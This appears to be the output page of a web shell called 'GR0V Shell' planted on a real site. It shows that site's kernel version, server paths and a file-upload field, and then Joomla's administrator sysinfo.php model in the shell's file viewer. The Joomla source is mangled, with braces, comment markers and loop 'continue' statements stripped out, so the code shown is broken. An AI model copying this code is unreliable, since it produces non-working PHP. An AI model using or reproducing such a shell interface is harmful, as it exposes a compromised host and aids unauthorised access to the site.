? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/administrator/components/com_admin/models/
File Upload :
Current File : /home/admin/public_html/old/administrator/components/com_admin/models/sysinfo.php

 * @package     Joomla.Administrator
 * @subpackage  com_admin
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt

defined('_JEXEC') or die;

use Joomla\Registry\Registry;

 * Model for the display of system information.
 * @since  1.6
class AdminModelSysInfo extends JModelLegacy
	 * @var array Some PHP settings
	 * @since  1.6
	protected $php_settings = null;

	 * @var array Config values
	 * @since  1.6
	protected $config = null;

	 * @var array Some system values
	 * @since  1.6
	protected $info = null;

	 * @var string PHP info
	 * @since  1.6
	protected $php_info = null;

	 * Information about writable state of directories
	 * @var array
	 * @since  1.6
	protected $directories = null;

	 * The current editor.
	 * @var string
	 * @since  1.6
	protected $editor = null;

	 * Method to get the ChangeLog
	 * @return array some php settings
	 * @since  1.6
	public function &getPhpSettings()
		if (!is_null($this->php_settings))
			return $this->php_settings;

		$this->php_settings = array();
		$this->php_settings['safe_mode'] = ini_get('safe_mode') == '1';
		$this->php_settings['display_errors'] = ini_get('display_errors') == '1';
		$this->php_settings['short_open_tag'] = ini_get('short_open_tag') == '1';
		$this->php_settings['file_uploads'] = ini_get('file_uploads') == '1';
		$this->php_settings['magic_quotes_gpc'] = ini_get('magic_quotes_gpc') == '1';
		$this->php_settings['register_globals'] = ini_get('register_globals') == '1';
		$this->php_settings['output_buffering'] = (bool) ini_get('output_buffering');
		$this->php_settings['open_basedir'] = ini_get('open_basedir');
		$this->php_settings['session.save_path'] = ini_get('session.save_path');
		$this->php_settings['session.auto_start'] = ini_get('session.auto_start');
		$this->php_settings['disable_functions'] = ini_get('disable_functions');
		$this->php_settings['xml'] = extension_loaded('xml');
		$this->php_settings['zlib'] = extension_loaded('zlib');
		$this->php_settings['zip'] = function_exists('zip_open') && function_exists('zip_read');
		$this->php_settings['mbstring'] = extension_loaded('mbstring');
		$this->php_settings['iconv'] = function_exists('iconv');

		return $this->php_settings;

	 * Method to get the config
	 * @return  array  config values
	 * @since  1.6
	public function &getConfig()
		if (!is_null($this->config))
			return $this->config;

		$registry = new Registry(new JConfig);
		$this->config = $registry->toArray();
		$hidden = array('host', 'user', 'password', 'ftp_user', 'ftp_pass', 'smtpuser', 'smtppass');

		foreach ($hidden as $key)
			$this->config[$key] = 'xxxxxx';

		return $this->config;

	 * Method to get the system information
	 * @return  array system information values
	 * @since   1.6
	public function &getInfo()
		if (!is_null($this->info))
			return $this->info;

		$this->info = array();
		$version = new JVersion;
		$platform = new JPlatform;
		$db = JFactory::getDbo();

		$this->info['php'] = php_uname();
		$this->info['dbversion'] = $db->getVersion();
		$this->info['dbcollation'] = $db->getCollation();
		$this->info['phpversion'] = phpversion();
		$this->info['server'] = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : getenv('SERVER_SOFTWARE');
		$this->info['sapi_name'] = php_sapi_name();
		$this->info['version'] = $version->getLongVersion();
		$this->info['platform'] = $platform->getLongVersion();
		$this->info['useragent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";

		return $this->info;

	 * Method to get if phpinfo method is enabled from php.ini
	 * @return  boolean True if enabled
	 * @since  3.4.1
	public function phpinfoEnabled()
		return !in_array('phpinfo', explode(',', ini_get('disable_functions')));

	 * Method to get the PHP info
	 * @return  string PHP info
	 * @since  1.6
	public function &getPHPInfo()
		if (!$this->phpinfoEnabled())
			$this->php_info = JText::_('COM_ADMIN_PHPINFO_DISABLED');

			return $this->php_info;

		if (!is_null($this->php_info))
			return $this->php_info;

		$phpInfo = ob_get_contents();
		preg_match_all('#<body[^>]*>(.*)</body>#siU', $phpInfo, $output);
		$output = preg_replace('#<table[^>]*>#', '<table class="table table-striped adminlist">', $output[1][0]);
		$output = preg_replace('#(\w),(\w)#', '\1, \2', $output);
		$output = preg_replace('#<hr />#', '', $output);
		$output = str_replace('<div class="center">', '', $output);
		$output = preg_replace('#<tr class="h">(.*)<\/tr>#', '<thead><tr class="h">$1</tr></thead><tbody>', $output);
		$output = str_replace('</table>', '</tbody></table>', $output);
		$output = str_replace('</div>', '', $output);
		$this->php_info = $output;

		return $this->php_info;

	 * Method to get the directory states
	 * @return array States of directories
	 * @since  1.6
	public function getDirectory()
		if (!is_null($this->directories))
			return $this->directories;

		$this->directories = array();

		$registry = JFactory::getConfig();
		$cparams = JComponentHelper::getParams('com_media');

		$this->_addDirectory('administrator/components', JPATH_ADMINISTRATOR . '/components');
		$this->_addDirectory('administrator/language', JPATH_ADMINISTRATOR . '/language');

		// List all admin languages
		$admin_langs = new DirectoryIterator(JPATH_ADMINISTRATOR . '/language');

		foreach ($admin_langs as $folder)
			if (!$folder->isDir() || $folder->isDot())

			$this->_addDirectory('administrator/language/' . $folder->getFilename(), JPATH_ADMINISTRATOR . '/language/' . $folder->getFilename());

		// List all manifests folders
		$manifests = new DirectoryIterator(JPATH_ADMINISTRATOR . '/manifests');

		foreach ($manifests as $folder)
			if (!$folder->isDir() || $folder->isDot())

			$this->_addDirectory('administrator/manifests/' . $folder->getFilename(), JPATH_ADMINISTRATOR . '/manifests/' . $folder->getFilename());

		$this->_addDirectory('administrator/modules', JPATH_ADMINISTRATOR . '/modules');
		$this->_addDirectory('administrator/templates', JPATH_THEMES);

		$this->_addDirectory('components', JPATH_SITE . '/components');

		$this->_addDirectory($cparams->get('image_path'), JPATH_SITE . '/' . $cparams->get('image_path'));

		// List all images folders
		$image_folders = new DirectoryIterator(JPATH_SITE . '/' . $cparams->get('image_path'));

		foreach ($image_folders as $folder)
			if (!$folder->isDir() || $folder->isDot())

			$this->_addDirectory('images/' . $folder->getFilename(), JPATH_SITE . '/' . $cparams->get('image_path') . '/' . $folder->getFilename());

		$this->_addDirectory('language', JPATH_SITE . '/language');

		// List all site languages
		$site_langs = new DirectoryIterator(JPATH_SITE . '/language');

		foreach ($site_langs as $folder)
			if (!$folder->isDir() || $folder->isDot())

			$this->_addDirectory('language/' . $folder->getFilename(), JPATH_SITE . '/language/' . $folder->getFilename());

		$this->_addDirectory('libraries', JPATH_LIBRARIES);

		$this->_addDirectory('media', JPATH_SITE . '/media');
		$this->_addDirectory('modules', JPATH_SITE . '/modules');
		$this->_addDirectory('plugins', JPATH_PLUGINS);

		$plugin_groups = new DirectoryIterator(JPATH_SITE . '/plugins');

		foreach ($plugin_groups as $folder)
			if (!$folder->isDir() || $folder->isDot())

			$this->_addDirectory('plugins/' . $folder->getFilename(), JPATH_PLUGINS . '/' . $folder->getFilename());

		$this->_addDirectory('templates', JPATH_SITE . '/templates');
		$this->_addDirectory('configuration.php', JPATH_CONFIGURATION . '/configuration.php');

		// Is there a cache path in configuration.php?
		if ($cache_path = trim($registry->get('cache_path', '')))
			// Frontend and backend use same directory for caching.
			$this->_addDirectory($cache_path, $cache_path, 'COM_ADMIN_CACHE_DIRECTORY');
			$this->_addDirectory('cache', JPATH_SITE . '/cache', 'COM_ADMIN_CACHE_DIRECTORY');
			$this->_addDirectory('administrator/cache', JPATH_CACHE, 'COM_ADMIN_CACHE_DIRECTORY');

		$this->_addDirectory($registry->get('log_path', JPATH_ROOT . '/log'), $registry->get('log_path', JPATH_ROOT . '/log'), 'COM_ADMIN_LOG_DIRECTORY');
		$this->_addDirectory($registry->get('tmp_path', JPATH_ROOT . '/tmp'), $registry->get('tmp_path', JPATH_ROOT . '/tmp'), 'COM_ADMIN_TEMP_DIRECTORY');

		return $this->directories;

	 * Method to add a directory
	 * @return void
	 * @since  1.6
	 * Method to add a directory
	 * @param   string  $name     Directory Name
	 * @param   string  $path     Directory path
	 * @param   string  $message  Message
	 * @return   void
	private function _addDirectory($name, $path, $message = '')
		$this->directories[$name] = array('writable' => is_writable($path), 'message' => $message);

	 * Method to get the editor
	 * @return  string The default editor
	 * @note: has to be removed (it is present in the config...)
	 * @since  1.6
	public function &getEditor()
		if (!is_null($this->editor))
			return $this->editor;

		$this->editor = JFactory::getConfig()->get('editor');

		return $this->editor;
